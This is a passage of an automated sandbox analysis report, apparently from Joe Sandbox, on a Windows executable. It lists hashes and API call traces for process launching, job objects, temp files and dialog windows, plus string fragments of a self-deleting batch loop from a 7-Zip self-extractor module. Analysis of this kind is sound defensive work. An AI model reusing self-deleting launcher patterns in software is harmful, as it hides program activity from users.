                                                                                • Instruction Fuzzy Hash: 2A41F771B609200AF308CF678C891A67FC3D7C9346744C23DD565CA6D9DABDC447C698
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d6b9b754f9b189d92509bd9194e6262c08822d317c9229910bcc5669ef11d2d
                                                                                • Instruction ID: 8f6eb64d06b658f293c5b46dbe98da55d8e186e99a2fb9da9eaca93df92f0056
                                                                                • Opcode Fuzzy Hash: 6d6b9b754f9b189d92509bd9194e6262c08822d317c9229910bcc5669ef11d2d
                                                                                • Instruction Fuzzy Hash: A7316872A047A646E310DE1ECC80263BBD3BFC5205F088276D4945B78BD539D4128295
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                                • Instruction ID: 0c79d8c59d00a78f9440f3aa51eedcdd78ab10b5fc93e450dee24b4d7cd4d7bf
                                                                                • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                                • Instruction Fuzzy Hash: 1341A561C14B9652EB224F7CC842272B320BFAB244F00D75AFDD179963FB3269846655
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4f676c29db07d748d27b39d428b6e09ec32336efd2a80984568a862303c1556d
                                                                                • Instruction ID: 51037b27fab7abe5882109eaafdaafd36d1536c3e678e8b13c54931181ec04f6
                                                                                • Opcode Fuzzy Hash: 4f676c29db07d748d27b39d428b6e09ec32336efd2a80984568a862303c1556d
                                                                                • Instruction Fuzzy Hash: D9211D7E370D0607A76C8B6DAD336B925C2E344348BC8A53DE14BC62D1EF6C9895C64D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                • Instruction ID: a7cdcc9f98ce9dbc60a73427d99236a85b447d866e4190eca6a24d33d7e231e4
                                                                                • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                • Instruction Fuzzy Hash: E421D33290062557CB02CE6EE4945A7F3A2FBD436AF174727ED8463290C628AC54C6A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                                • Instruction ID: 97b97acb8ff96b1b4e43437944a1cf665e1ec4585e0b194a145c9dbb8504525b
                                                                                • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                                • Instruction Fuzzy Hash: 6F21297251442587C701DF5DE4986B7B3E1FFD4319F678A37D9818B180C638DC85D6A4
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                • GetCommandLineW.KERNEL32(0041A9F0,00000000,00000000), ref: 00401DEC
                                                                                  • Part of subcall function 00411A62: memcpy.MSVCRT(?,?,00000000,00000001,?,?,00000000,?,?,00401E36,00000000,0000003A,?," -,sfxwaitall), ref: 00411A87
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401E98
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?," -), ref: 00401EA0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A,?), ref: 00401EA8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000,0000003A), ref: 00401EB0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?,00000000), ref: 00401EB8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?,?), ref: 00401EC0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020,?), ref: 00401EC8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?,00000020), ref: 00401ED0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022,?), ref: 00401ED8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,0041AAE4,?,?,00000022), ref: 00401EE0
                                                                                • GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401EF3
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 00401F19
                                                                                • GetLastError.KERNEL32 ref: 00401F23
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00401F2E
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00401F36
                                                                                • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 00401F4D
                                                                                • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 00401F5E
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000), ref: 00401F6D
                                                                                • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00401F8A
                                                                                • ResumeThread.KERNEL32(?), ref: 00401F93
                                                                                • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF), ref: 00401FB6
                                                                                • ResumeThread.KERNEL32(?), ref: 00401FBF
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401FCA
                                                                                • CloseHandle.KERNEL32(?), ref: 00401FD9
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401FE2
                                                                                • GetLastError.KERNEL32 ref: 00401FEC
                                                                                • CloseHandle.KERNEL32(?), ref: 00401FF8
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401FFF
                                                                                • CloseHandle.KERNEL32(?), ref: 00402009
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$CloseHandleObject$CreateProcess$??2@CompletionErrorLastResumeThreadmemcpy$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                                • String ID: " -$sfxwaitall
                                                                                • API String ID: 1989023053-3991362806
                                                                                • Opcode ID: b512eb50f073bc5073f6029a29708b2a397875fe1bb3ba0b5eecb9327caccc6b
                                                                                • Instruction ID: 5297b6db97987cb25ecf0bcc30189225a2ece590cb556cf519fd76e88c7d76d0
                                                                                • Opcode Fuzzy Hash: b512eb50f073bc5073f6029a29708b2a397875fe1bb3ba0b5eecb9327caccc6b
                                                                                • Instruction Fuzzy Hash: 21615A32500109BFDF11AF61DC45DEE7BB9AF04348F14813AFA12A21B1EB39AD95CB59
                                                                                APIs
                                                                                • GetDriveTypeW.KERNEL32(?,PreExtract,00000000,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract), ref: 00405BD5
                                                                                  • Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
                                                                                  • Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
                                                                                  • Part of subcall function 0040439D: wsprintfW.USER32 ref: 00404400
                                                                                  • Part of subcall function 0040439D: GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405C09
                                                                                • WriteFile.KERNEL32(00000000,?,?,0041E844,00000000,00000001,",?,del "," goto Repeat,004070C0,if exist ",",004070C0,del ",:Repeat), ref: 00405CB8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CC3
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CCA
                                                                                • SetFileAttributesW.KERNEL32(004070C0,00000000,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CE1
                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00405CF3
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405CFC
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405D05
                                                                                • ??3@YAXPAX@Z.MSVCRT(004070C0,?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C), ref: 00405D0D
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                  • Part of subcall function 00411CE3: memcpy.MSVCRT(?,?,?,00000000,?,?,004046EB,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 00411D06
                                                                                  • Part of subcall function 00404473: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00000000,0041E080,00920E58,004016D0,0000FDE9,00920E58), ref: 004044A6
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405D20
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C,00000000), ref: 00405D28
                                                                                • ??3@YAXPAX@Z.MSVCRT(004070C0,?,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract,0041E89C), ref: 00405D30
                                                                                • ??3@YAXPAX@Z.MSVCRT(004070C0,PreExtract,00000000,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844,PreExtract), ref: 00405D3B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$File$memcpy$??2@AttributesPathTemp$ByteCharCloseCreateDriveExecuteHandleMultiShellTypeWideWritewsprintf
                                                                                • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$PreExtract$del "$if exist "$open
                                                                                • API String ID: 1368565367-2062918900
                                                                                • Opcode ID: 6a2c42ab4ba589dd8ec8f7f6231d9d8f7900a9009e1932f2d8cd21323a083c06
                                                                                • Instruction ID: e7338ad49e5ec867d94482016769a831fa3651e0b874e5bd32b93c107b1fbaea
                                                                                • Opcode Fuzzy Hash: 6a2c42ab4ba589dd8ec8f7f6231d9d8f7900a9009e1932f2d8cd21323a083c06
                                                                                • Instruction Fuzzy Hash: BE415031904004BADB05EBA1DC5ADEF7B75EF45304F10806BF602B61A5EB786EC5CB98
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
                                                                                • LoadIconW.USER32(00000000), ref: 00408F6C
                                                                                • GetSystemMetrics.USER32(00000032), ref: 00408F80
                                                                                • GetSystemMetrics.USER32(00000031), ref: 00408F85
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
                                                                                • LoadImageW.USER32(00000000), ref: 00408F91
                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
                                                                                  • Part of subcall function 00408618: GetDlgItem.USER32(?,?), ref: 00408629
                                                                                  • Part of subcall function 00408618: GetWindowTextLengthW.USER32(00000000), ref: 0040862C
                                                                                  • Part of subcall function 00408618: GetDlgItem.USER32(?,?), ref: 00408641
                                                                                  • Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
                                                                                  • Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF
                                                                                • GetDlgItem.USER32(?,000004B2), ref: 00408FD7
                                                                                • GetDlgItem.USER32(?,000004B2), ref: 00408FE1
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00408FED
                                                                                • SetWindowLongW.USER32(000000F0,000000F0,00000000), ref: 00408FFC
                                                                                • GetDlgItem.USER32(?,000004B5), ref: 0040900A
                                                                                • GetDlgItem.USER32(?,000004B5), ref: 00409018
                                                                                • GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409033
                                                                                • GetDlgItem.USER32(?,000004B2), ref: 00409040
                                                                                • GetWindow.USER32(?,00000005), ref: 0040911F
                                                                                • GetWindow.USER32(?,00000005), ref: 0040913B
                                                                                • GetWindow.USER32(?,00000005), ref: 00409153
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,00000000,?,?,?,?,?,0040932F), ref: 004091B3
                                                                                • LoadIconW.USER32(00000000), ref: 004091BA
                                                                                • GetDlgItem.USER32(?,000004B1), ref: 004091D9
                                                                                • SendMessageW.USER32(00000000), ref: 004091DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ItemWindow$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                • String ID:
                                                                                • API String ID: 4137352925-0
                                                                                • Opcode ID: ce9f75e029d06e7367fd13abbf1c97b27e9b6aa4c7e0128f4e9ec34cf0a6066f
                                                                                • Instruction ID: 55e12659e9cef202b758582d1d7e0fb50da9d044521ae722c1703057fdaec8c6
                                                                                • Opcode Fuzzy Hash: ce9f75e029d06e7367fd13abbf1c97b27e9b6aa4c7e0128f4e9ec34cf0a6066f
                                                                                • Instruction Fuzzy Hash: DD71D5703447067BEA256B218D4AF2F3A99DB84704F10483EF652BA2D3CB7DDC019A5E
                                                                                APIs
                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00404C9E
                                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00404CB1
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404CBE
                                                                                  • Part of subcall function 00404BDD: GetWindowTextLengthW.USER32(?), ref: 00404BEA
                                                                                  • Part of subcall function 00404BDD: GetWindowTextW.USER32(?,00000000,00000001), ref: 00404C04
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000005,?,000000F0,?,?,00000040), ref: 00404CE8
                                                                                • GetParent.USER32 ref: 00404CF6
                                                                                • LoadLibraryA.KERNEL32(riched20,?,00000005,?,000000F0,?,?,00000040), ref: 00404D0A
                                                                                • GetMenu.USER32 ref: 00404D1B
                                                                                • SetThreadLocale.KERNEL32(00000419,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404D28
                                                                                • CreateWindowExW.USER32(00000000,RichEdit20W,0041AA3C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00404D58
                                                                                • DestroyWindow.USER32(?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404D65
                                                                                • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00404D7A
                                                                                • GetSysColor.USER32(0000000F), ref: 00404D7E
                                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00404D8C
                                                                                • SendMessageW.USER32(00000000,00000461,?,?), ref: 00404DB2
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404DB7
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000005,?,000000F0,?,?,00000040), ref: 00404DBF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                • API String ID: 3514532227-2281146334
                                                                                • Opcode ID: 31280b59029b913c7dd6943f30d46b327974baec36b110e02c3e2059bbe9df94
                                                                                • Instruction ID: 47a03a17b0e693a7b9506e1f1950c79874d349430206e003879b4e45598c68c3
                                                                                • Opcode Fuzzy Hash: 31280b59029b913c7dd6943f30d46b327974baec36b110e02c3e2059bbe9df94
                                                                                • Instruction Fuzzy Hash: 4131C271A02119BFDB01ABA1DD49EEF7B7DEF44704F10402AF601B2291DB794E508B6D
                                                                                APIs
                                                                                • GetWindowDC.USER32(00000000), ref: 00403AE8
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00403AF4
